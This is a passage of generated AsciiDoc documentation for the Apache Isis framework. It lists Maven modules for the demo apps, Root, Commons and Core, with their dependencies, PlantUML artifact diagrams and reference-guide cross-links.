+\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui:pom:${project.version} +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-ui:pom:${project.version} +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Demo - Vaadin\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-vaadin\nType: jar\nDirectory: \/examples\/demo\/vaadin\n----\n|.Dependencies\n****\norg.apache.isis.examples.apps:demo-web:jar:${project.version} +\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-viewer:jar:${project.version} +\norg.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui-vaa:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui-wkt:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-ui-wkt:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-ui-wkt:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Demo - Web\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-web\nType: jar\nDirectory: \/examples\/demo\/web\n----\n|.Components\n****\ndemoapp.web._infra.utils.ThereCanBeOnlyOne +\n****\n\n.Dependencies\n****\norg.apache.isis.examples.apps:demo-domain:jar:${project.version} +\norg.apache.isis.extensions:isis-extensions-command-replay-primary:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-replay-secondary:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-cors-impl:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-webapp:pom:<managed> +\norg.springframework.boot:spring-boot-starter:jar:<managed> +\norg.springframework.boot:spring-boot-starter-actuator:jar:<managed> +\norg.springframework.boot:spring-boot-starter-log4j2:jar:<managed> +\n****\n\n|Demo - Wicket\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-wicket\nType: jar\nDirectory: \/examples\/demo\/wicket\n----\n|.Components\n****\ndemoapp.webapp.wicket.ui.custom.WhereInTheWorldPanelFactory +\n****\n\n.Dependencies\n****\norg.apache.isis.examples.apps:demo-web:jar:${project.version} +\norg.apache.isis.extensions:isis-extensions-pdfjs-ui:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-webapp:pom:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui-wkt:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-ui-wkt:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-ui-wkt:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:2.0.0-SNAPSHOT +\norg.apache.isis.viewer:isis-viewer-wicket-viewer:jar:2.0.0-SNAPSHOT +\n****\n|===\n\n== Root\n\n[plantuml,Root,svg]\n----\n@startuml(id=Root)\ntitle Root - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Root\\n[Software System]\" {\n rectangle \"==Apache Isis\\n<size:10>[Container: packaging: pom]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis (Aggregator)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis - Antora\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Supplemental - Legal Info\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Root)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis (Aggregator)\n[source,yaml]\n----\nGroup: org.apache.isis\nArtifact: isis-all\nType: pom\nDirectory: \/\n----\n|Convenience aggregator POM that references all modules, some explicitely,\nothers via profiles, that are not activiated per default.\nThe parent POM of the core framework is isis-parent\/pom.xml.\n\n|Apache Isis - Antora\n[source,yaml]\n----\nGroup: org.apache.isis\nArtifact: antora\nType: pom\nDirectory: \/antora\n----\n|\n\n|Apache Isis\n[source,yaml]\n----\nGroup: org.apache.isis\nArtifact: isis-parent\nType: pom\nDirectory: \/isis-parent\n----\n|Parent for the core framework + extensions, starter parent pom for starter apps.\n\n|Apache Isis Supplemental - Legal Info\n[source,yaml]\n----\nGroup: org.apache.isis\nArtifact: supplemental-model\nType: jar\nDirectory: \/supplemental-model\n----\n|For example, the templates used by many Apache distributions assemble a listing of project dependencies\naccording to their organization name (and URL), along with the URL each project's website. When dependency\nPOMs are missing this information, the dependency notice file that the Remote Resources Plugin renders can\nbe invalid.\nTo compensate for incomplete dependency POMs, we use the supplemental models support.\n|===\n\n== Commons\n\n[plantuml,Commons,svg]\n----\n@startuml(id=Commons)\ntitle Commons - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Commons\\n[Software System]\" {\n rectangle \"==Apache Isis Commons\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Commons)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Commons\n[source,yaml]\n----\nGroup: org.apache.isis.commons\nArtifact: isis-commons\nType: jar\nDirectory: \/commons\n----\n|Apache Isis Commons is a library with utilities, that are shared with the entire Apache Isis ecosystem.\n\n.Dependencies\n****\ncom.fasterxml.jackson.core:jackson-databind:jar:<managed> +\ncom.google.code.findbugs:annotations:jar:<managed> +\njavax:javaee-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.jupiter:junit-jupiter-params:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\norg.slf4j:slf4j-api:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\norg.springframework:spring-tx:jar:<managed> +\norg.springframework.boot:spring-boot-starter:jar:<managed> +\norg.springframework.boot:spring-boot-starter-log4j2:jar:<managed> +\norg.yaml:snakeyaml:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:commons:index\/collections\/Can.adoc[Can], xref:refguide:commons:index\/collections\/Cardinality.adoc[Cardinality], xref:refguide:commons:index\/functional\/Result.adoc[Result], xref:refguide:commons:index\/resource\/ResourceCoordinates.adoc[ResourceCoordinates]\n****\n|===\n\n== Core\n\n[plantuml,Core,svg]\n----\n@startuml(id=Core)\ntitle Core - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<13>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<14>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<15>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core\\n[Software System]\" {\n rectangle \"==Apache Isis - JDK Supplemental\\n<size:10>[Container: packaging: pom]<\/size>\" <<14>> as 14\n rectangle \"==Apache Isis Core\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Core - AppLib\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Core - Code Gen (ByteBuddy)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Core - Configuration\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Core - Interaction\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Core - MetaModel\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Core - Runtime\\n<size:10>[Container: packaging: jar]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Core - Runtime Services\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Core - Schemas\\n<size:10>[Container: packaging: jar]<\/size>\" <<15>> as 15\n rectangle \"==Apache Isis Core - Security\\n<size:10>[Container: packaging: jar]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Core - Transaction\\n<size:10>[Container: packaging: jar]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Core - Unit Test Support\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Core - WebApp\\n<size:10>[Container: packaging: jar]<\/size>\" <<13>> as 13\n}\n2 .[#707070].> 14 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 8 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 10 : \"\"\n2 .[#707070].> 15 : \"\"\n2 .[#707070].> 11 : \"\"\n2 .[#707070].> 12 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 13 : \"\"\n@enduml\n----\n.Projects\/Modules (Core)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Core\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core\nType: pom\nDirectory: \/core\n----\n|Core framework, providing metamodel, runtime and core APIs.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Core - AppLib\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-applib\nType: jar\nDirectory: \/api\/applib\n----\n|Isis application library, defining annotations and utilities for the\ndefault (Java) programming model.\n\n.Components\n****\no.a.i.applib.annotation.DomainObject +\no.a.i.applib.annotation.DomainService +\no.a.i.applib.services.commanddto.conmap.ContentMappingServiceForCommandDto +\no.a.i.applib.services.commanddto.conmap.ContentMappingServiceForCommandsDto +\no.a.i.applib.services.commanddto.processor.spi.CommandDtoProcessorServiceIdentity +\no.a.i.applib.services.publishing.log.CommandLogger +\no.a.i.applib.services.publishing.log.EntityChangesLogger +\no.a.i.applib.services.publishing.log.EntityPropertyChangeLogger +\no.a.i.applib.services.publishing.log.ExecutionLogger +\no.a.i.applib.services.session.SessionLoggingServiceLogging +\n****\n\n.Dependencies\n****\ncom.google.code.findbugs:annotations:jar:<managed> +\njavax:javaee-api:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.assertj:assertj-core:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:applib:index\/AbstractViewModel.adoc[AbstractViewModel], xref:refguide:applib:index\/Identifier.adoc[Identifier], xref:refguide:applib:index\/IsisModuleApplib.adoc[IsisModuleApplib], xref:refguide:applib:index\/RecreatableDomainObject.adoc[RecreatableDomainObject], xref:refguide:applib:index\/ViewModel.adoc[ViewModel], xref:refguide:applib:index\/adapters\/AbstractValueSemanticsProvider.adoc[AbstractValueSemanticsProvider], xref:refguide:applib:index\/adapters\/DefaultsProvider.adoc[DefaultsProvider], xref:refguide:applib:index\/adapters\/EncoderDecoder.adoc[EncoderDecoder], xref:refguide:applib:index\/adapters\/EncodingException.adoc[EncodingException], xref:refguide:applib:index\/adapters\/Parser.adoc[Parser], xref:refguide:applib:index\/adapters\/ParsingException.adoc[ParsingException], xref:refguide:applib:index\/adapters\/ValueSemanticsProvider.adoc[ValueSemanticsProvider], xref:refguide:applib:index\/annotation\/Action.adoc[Action], xref:refguide:applib:index\/annotation\/ActionLayout.adoc[ActionLayout], xref:refguide:applib:index\/annotation\/BookmarkPolicy.adoc[BookmarkPolicy], xref:refguide:applib:index\/annotation\/Bounding.adoc[Bounding], xref:refguide:applib:index\/annotation\/Collection.adoc[Collection], xref:refguide:applib:index\/annotation\/CollectionLayout.adoc[CollectionLayout], xref:refguide:applib:index\/annotation\/Defaulted.adoc[Defaulted], xref:refguide:applib:index\/annotation\/DomainObject.adoc[DomainObject], xref:refguide:applib:index\/annotation\/DomainObjectLayout.adoc[DomainObjectLayout], xref:refguide:applib:index\/annotation\/DomainService.adoc[DomainService], xref:refguide:applib:index\/annotation\/DomainServiceLayout.adoc[DomainServiceLayout], xref:refguide:applib:index\/annotation\/DomainServiceLayout~MenuBar.adoc[DomainServiceLayout.MenuBar], xref:refguide:applib:index\/annotation\/Editing.adoc[Editing], xref:refguide:applib:index\/annotation\/EntityChangeKind.adoc[EntityChangeKind], xref:refguide:applib:index\/annotation\/EqualByContent.adoc[EqualByContent], xref:refguide:applib:index\/annotation\/Facets.adoc[Facets], xref:refguide:applib:index\/annotation\/HomePage.adoc[HomePage], xref:refguide:applib:index\/annotation\/InteractionScope.adoc[InteractionScope], xref:refguide:applib:index\/annotation\/LabelPosition.adoc[LabelPosition], xref:refguide:applib:index\/annotation\/MemberOrder.adoc[MemberOrder], xref:refguide:applib:index\/annotation\/MinLength.adoc[MinLength], xref:refguide:applib:index\/annotation\/Module.adoc[Module], xref:refguide:applib:index\/annotation\/Nature.adoc[Nature], xref:refguide:applib:index\/annotation\/NatureOfService.adoc[NatureOfService], xref:refguide:applib:index\/annotation\/Navigable.adoc[Navigable], xref:refguide:applib:index\/annotation\/Optionality.adoc[Optionality], xref:refguide:applib:index\/annotation\/OrderPrecedence.adoc[OrderPrecedence], xref:refguide:applib:index\/annotation\/Parameter.adoc[Parameter], xref:refguide:applib:index\/annotation\/ParameterLayout.adoc[ParameterLayout], xref:refguide:applib:index\/annotation\/Programmatic.adoc[Programmatic], xref:refguide:applib:index\/annotation\/Projecting.adoc[Projecting], xref:refguide:applib:index\/annotation\/PromptStyle.adoc[PromptStyle], xref:refguide:applib:index\/annotation\/Property.adoc[Property], xref:refguide:applib:index\/annotation\/PropertyLayout.adoc[PropertyLayout], xref:refguide:applib:index\/annotation\/Publishing.adoc[Publishing], xref:refguide:applib:index\/annotation\/Redirect.adoc[Redirect], xref:refguide:applib:index\/annotation\/RenderDay.adoc[RenderDay], xref:refguide:applib:index\/annotation\/Repainting.adoc[Repainting], xref:refguide:applib:index\/annotation\/RestrictTo.adoc[RestrictTo], xref:refguide:applib:index\/annotation\/SemanticsOf.adoc[SemanticsOf], xref:refguide:applib:index\/annotation\/Snapshot.adoc[Snapshot], xref:refguide:applib:index\/annotation\/Title.adoc[Title], xref:refguide:applib:index\/annotation\/Value.adoc[Value], xref:refguide:applib:index\/annotation\/Where.adoc[Where], xref:refguide:applib:index\/client\/RepresentationTypeSimplifiedV2.adoc[RepresentationTypeSimplifiedV2], xref:refguide:applib:index\/client\/SuppressionType.adoc[SuppressionType], xref:refguide:applib:index\/clock\/VirtualClock.adoc[VirtualClock], xref:refguide:applib:index\/domain\/DomainObjectList.adoc[DomainObjectList], xref:refguide:applib:index\/events\/EventObjectBase.adoc[EventObjectBase], xref:refguide:applib:index\/events\/domain\/AbstractDomainEvent.adoc[AbstractDomainEvent], xref:refguide:applib:index\/events\/domain\/ActionDomainEvent.adoc[ActionDomainEvent], xref:refguide:applib:index\/events\/domain\/CollectionDomainEvent.adoc[CollectionDomainEvent], xref:refguide:applib:index\/events\/domain\/PropertyDomainEvent.adoc[PropertyDomainEvent], xref:refguide:applib:index\/events\/lifecycle\/AbstractLifecycleEvent.adoc[AbstractLifecycleEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectCreatedEvent.adoc[ObjectCreatedEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectLoadedEvent.adoc[ObjectLoadedEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectPersistedEvent.adoc[ObjectPersistedEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectPersistingEvent.adoc[ObjectPersistingEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectRemovingEvent.adoc[ObjectRemovingEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectUpdatedEvent.adoc[ObjectUpdatedEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectUpdatingEvent.adoc[ObjectUpdatingEvent], xref:refguide:applib:index\/events\/ui\/AbstractUiEvent.adoc[AbstractUiEvent], xref:refguide:applib:index\/events\/ui\/CssClassUiEvent.adoc[CssClassUiEvent], xref:refguide:applib:index\/events\/ui\/IconUiEvent.adoc[IconUiEvent], xref:refguide:applib:index\/events\/ui\/LayoutUiEvent.adoc[LayoutUiEvent], xref:refguide:applib:index\/events\/ui\/TitleUiEvent.adoc[TitleUiEvent], xref:refguide:applib:index\/exceptions\/RecoverableException.adoc[RecoverableException], xref:refguide:applib:index\/exceptions\/TranslatableException.adoc[TranslatableException], xref:refguide:applib:index\/exceptions\/UnrecoverableException.adoc[UnrecoverableException], xref:refguide:applib:index\/exceptions\/unrecoverable\/DomainModelException.adoc[DomainModelException], xref:refguide:applib:index\/exceptions\/unrecoverable\/MetaModelException.adoc[MetaModelException], xref:refguide:applib:index\/exceptions\/unrecoverable\/NoAuthenticatorException.adoc[NoAuthenticatorException], xref:refguide:applib:index\/exceptions\/unrecoverable\/ObjectNotFoundException.adoc[ObjectNotFoundException], xref:refguide:applib:index\/exceptions\/unrecoverable\/ObjectPersistenceException.adoc[ObjectPersistenceException], xref:refguide:applib:index\/exceptions\/unrecoverable\/PersistFailedException.adoc[PersistFailedException], xref:refguide:applib:index\/exceptions\/unrecoverable\/ReflectiveActionException.adoc[ReflectiveActionException], xref:refguide:applib:index\/exceptions\/unrecoverable\/RepositoryException.adoc[RepositoryException], xref:refguide:applib:index\/exceptions\/unrecoverable\/UnexpectedCallException.adoc[UnexpectedCallException], xref:refguide:applib:index\/exceptions\/unrecoverable\/UnknownTypeException.adoc[UnknownTypeException], xref:refguide:applib:index\/graph\/Edge.adoc[Edge], xref:refguide:applib:index\/graph\/SimpleEdge.adoc[SimpleEdge], xref:refguide:applib:index\/graph\/Vertex.adoc[Vertex], xref:refguide:applib:index\/graph\/tree\/LazyTreeNode.adoc[LazyTreeNode], xref:refguide:applib:index\/graph\/tree\/TreeAdapter.adoc[TreeAdapter], xref:refguide:applib:index\/graph\/tree\/TreeNode.adoc[TreeNode], xref:refguide:applib:index\/graph\/tree\/TreePath.adoc[TreePath], xref:refguide:applib:index\/graph\/tree\/TreeState.adoc[TreeState], xref:refguide:applib:index\/id\/HasLogicalType.adoc[HasLogicalType], xref:refguide:applib:index\/id\/LogicalType.adoc[LogicalType], xref:refguide:applib:index\/jaxb\/DataTypeFactory.adoc[DataTypeFactory], xref:refguide:applib:index\/jaxb\/JavaSqlJaxbAdapters.adoc[JavaSqlJaxbAdapters], xref:refguide:applib:index\/jaxb\/JavaSqlXMLGregorianCalendarMarshalling.adoc[JavaSqlXMLGregorianCalendarMarshalling], xref:refguide:applib:index\/jaxb\/JavaTimeJaxbAdapters.adoc[JavaTimeJaxbAdapters], xref:refguide:applib:index\/jaxb\/JavaTimeXMLGregorianCalendarMarshalling.adoc[JavaTimeXMLGregorianCalendarMarshalling], xref:refguide:applib:index\/jaxb\/JavaUtilJaxbAdapters.adoc[JavaUtilJaxbAdapters], xref:refguide:applib:index\/jaxb\/JodaTimeJaxbAdapters.adoc[JodaTimeJaxbAdapters], xref:refguide:applib:index\/jaxb\/JodaTimeXMLGregorianCalendarMarshalling.adoc[JodaTimeXMLGregorianCalendarMarshalling], xref:refguide:applib:index\/jaxb\/PersistentEntitiesAdapter.adoc[PersistentEntitiesAdapter], xref:refguide:applib:index\/jaxb\/PersistentEntityAdapter.adoc[PersistentEntityAdapter], xref:refguide:applib:index\/jaxb\/PrimitiveJaxbAdapters.adoc[PrimitiveJaxbAdapters], xref:refguide:applib:index\/layout\/component\/ActionLayoutData.adoc[ActionLayoutData], xref:refguide:applib:index\/layout\/component\/ActionLayoutDataOwner.adoc[ActionLayoutDataOwner], xref:refguide:applib:index\/layout\/component\/CollectionLayoutData.adoc[CollectionLayoutData], xref:refguide:applib:index\/layout\/component\/CollectionLayoutDataOwner.adoc[CollectionLayoutDataOwner], xref:refguide:applib:index\/layout\/component\/CssClassFaPosition.adoc[CssClassFaPosition], xref:refguide:applib:index\/layout\/component\/DomainObjectLayoutData.adoc[DomainObjectLayoutData], xref:refguide:applib:index\/layout\/component\/DomainObjectLayoutDataOwner.adoc[DomainObjectLayoutDataOwner], xref:refguide:applib:index\/layout\/component\/FieldSet.adoc[FieldSet], xref:refguide:applib:index\/layout\/component\/FieldSetOwner.adoc[FieldSetOwner], xref:refguide:applib:index\/layout\/component\/HasBookmarking.adoc[HasBookmarking], xref:refguide:applib:index\/layout\/component\/HasCssClass.adoc[HasCssClass], xref:refguide:applib:index\/layout\/component\/HasCssClassFa.adoc[HasCssClassFa], xref:refguide:applib:index\/layout\/component\/HasDescribedAs.adoc[HasDescribedAs], xref:refguide:applib:index\/layout\/component\/HasHidden.adoc[HasHidden], xref:refguide:applib:index\/layout\/component\/HasNamed.adoc[HasNamed], xref:refguide:applib:index\/layout\/component\/MemberRegion.adoc[MemberRegion], xref:refguide:applib:index\/layout\/component\/MemberRegionOwner.adoc[MemberRegionOwner], xref:refguide:applib:index\/layout\/component\/Owned.adoc[Owned], xref:refguide:applib:index\/layout\/component\/Owner.adoc[Owner], xref:refguide:applib:index\/layout\/component\/PropertyLayoutData.adoc[PropertyLayoutData], xref:refguide:applib:index\/layout\/component\/ServiceActionLayoutData.adoc[ServiceActionLayoutData], xref:refguide:applib:index\/layout\/component\/ServiceActionLayoutDataOwner.adoc[ServiceActionLayoutDataOwner], xref:refguide:applib:index\/layout\/grid\/Grid.adoc[Grid], xref:refguide:applib:index\/layout\/grid\/GridAbstract.adoc[GridAbstract], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3ClearFix.adoc[BS3ClearFix], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3ClearFixHidden.adoc[BS3ClearFixHidden], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3ClearFixVisible.adoc[BS3ClearFixVisible], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Col.adoc[BS3Col], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Element.adoc[BS3Element], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3ElementAbstract.adoc[BS3ElementAbstract], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Grid.adoc[BS3Grid], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Row.adoc[BS3Row], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3RowContent.adoc[BS3RowContent], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3RowContentOwner.adoc[BS3RowContentOwner], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3RowOwner.adoc[BS3RowOwner], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Tab.adoc[BS3Tab], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3TabGroup.adoc[BS3TabGroup], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3TabGroupOwner.adoc[BS3TabGroupOwner], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3TabOwner.adoc[BS3TabOwner], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/HasCssId.adoc[HasCssId], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/Size.adoc[Size], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/SizeSpan.adoc[SizeSpan], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/WithinGrid.adoc[WithinGrid], xref:refguide:applib:index\/layout\/links\/Link.adoc[Link], xref:refguide:applib:index\/layout\/menubars\/HasNamed.adoc[HasNamed], xref:refguide:applib:index\/layout\/menubars\/Menu.adoc[Menu], xref:refguide:applib:index\/layout\/menubars\/MenuBar.adoc[MenuBar], xref:refguide:applib:index\/layout\/menubars\/MenuBars.adoc[MenuBars], xref:refguide:applib:index\/layout\/menubars\/MenuBarsAbstract.adoc[MenuBarsAbstract], xref:refguide:applib:index\/layout\/menubars\/MenuSection.adoc[MenuSection], xref:refguide:applib:index\/layout\/menubars\/bootstrap3\/BS3Menu.adoc[BS3Menu], xref:refguide:applib:index\/layout\/menubars\/bootstrap3\/BS3MenuBar.adoc[BS3MenuBar], xref:refguide:applib:index\/layout\/menubars\/bootstrap3\/BS3MenuBars.adoc[BS3MenuBars], xref:refguide:applib:index\/layout\/menubars\/bootstrap3\/BS3MenuSection.adoc[BS3MenuSection], xref:refguide:applib:index\/mixins\/dto\/Dto.adoc[Dto], xref:refguide:applib:index\/mixins\/dto\/DtoMixinConstants.adoc[DtoMixinConstants], xref:refguide:applib:index\/mixins\/dto\/Dto_downloadXml.adoc[Dto_downloadXml], xref:refguide:applib:index\/mixins\/dto\/Dto_downloadXsd.adoc[Dto_downloadXsd], xref:refguide:applib:index\/mixins\/layout\/LayoutMixinConstants.adoc[LayoutMixinConstants], xref:refguide:applib:index\/mixins\/layout\/Object_downloadLayoutXml.adoc[Object_downloadLayoutXml], xref:refguide:applib:index\/mixins\/metamodel\/Object_downloadMetamodelXml.adoc[Object_downloadMetamodelXml], xref:refguide:applib:index\/mixins\/metamodel\/Object_objectIdentifier.adoc[Object_objectIdentifier], xref:refguide:applib:index\/mixins\/metamodel\/Object_objectType.adoc[Object_objectType], xref:refguide:applib:index\/mixins\/metamodel\/Object_rebuildMetamodel.adoc[Object_rebuildMetamodel], xref:refguide:applib:index\/mixins\/rest\/Object_openRestApi.adoc[Object_openRestApi], xref:refguide:applib:index\/mixins\/security\/HasUsername.adoc[HasUsername], xref:refguide:applib:index\/mixins\/system\/DomainChangeRecord.adoc[DomainChangeRecord], xref:refguide:applib:index\/mixins\/system\/DomainChangeRecord_openTargetObject.adoc[DomainChangeRecord_openTargetObject], xref:refguide:applib:index\/mixins\/system\/DomainChangeRecord~ChangeType.adoc[DomainChangeRecord.ChangeType], xref:refguide:applib:index\/mixins\/system\/HasInteractionId.adoc[HasInteractionId], xref:refguide:applib:index\/mixins\/system\/HasTransactionId.adoc[HasTransactionId], xref:refguide:applib:index\/mixins\/updates\/OnUpdatedAt.adoc[OnUpdatedAt], xref:refguide:applib:index\/mixins\/updates\/OnUpdatedBy.adoc[OnUpdatedBy], xref:refguide:applib:index\/mixins\/updates\/OnUpdatedByAndAt.adoc[OnUpdatedByAndAt], xref:refguide:applib:index\/query\/AllInstancesQuery.adoc[AllInstancesQuery], xref:refguide:applib:index\/query\/NamedQuery.adoc[NamedQuery], xref:refguide:applib:index\/query\/Query.adoc[Query], xref:refguide:applib:index\/query\/QueryRange.adoc[QueryRange], xref:refguide:applib:index\/services\/acceptheader\/AcceptHeaderService.adoc[AcceptHeaderService], xref:refguide:applib:index\/services\/appfeat\/ApplicationFeature.adoc[ApplicationFeature], xref:refguide:applib:index\/services\/appfeat\/ApplicationFeatureId.adoc[ApplicationFeatureId], xref:refguide:applib:index\/services\/appfeat\/ApplicationFeatureRepository.adoc[ApplicationFeatureRepository], xref:refguide:applib:index\/services\/appfeat\/ApplicationFeatureSort.adoc[ApplicationFeatureSort], xref:refguide:applib:index\/services\/appfeat\/ApplicationMemberSort.adoc[ApplicationMemberSort], xref:refguide:applib:index\/services\/bookmark\/Bookmark.adoc[Bookmark], xref:refguide:applib:index\/services\/bookmark\/BookmarkHolder.adoc[BookmarkHolder], 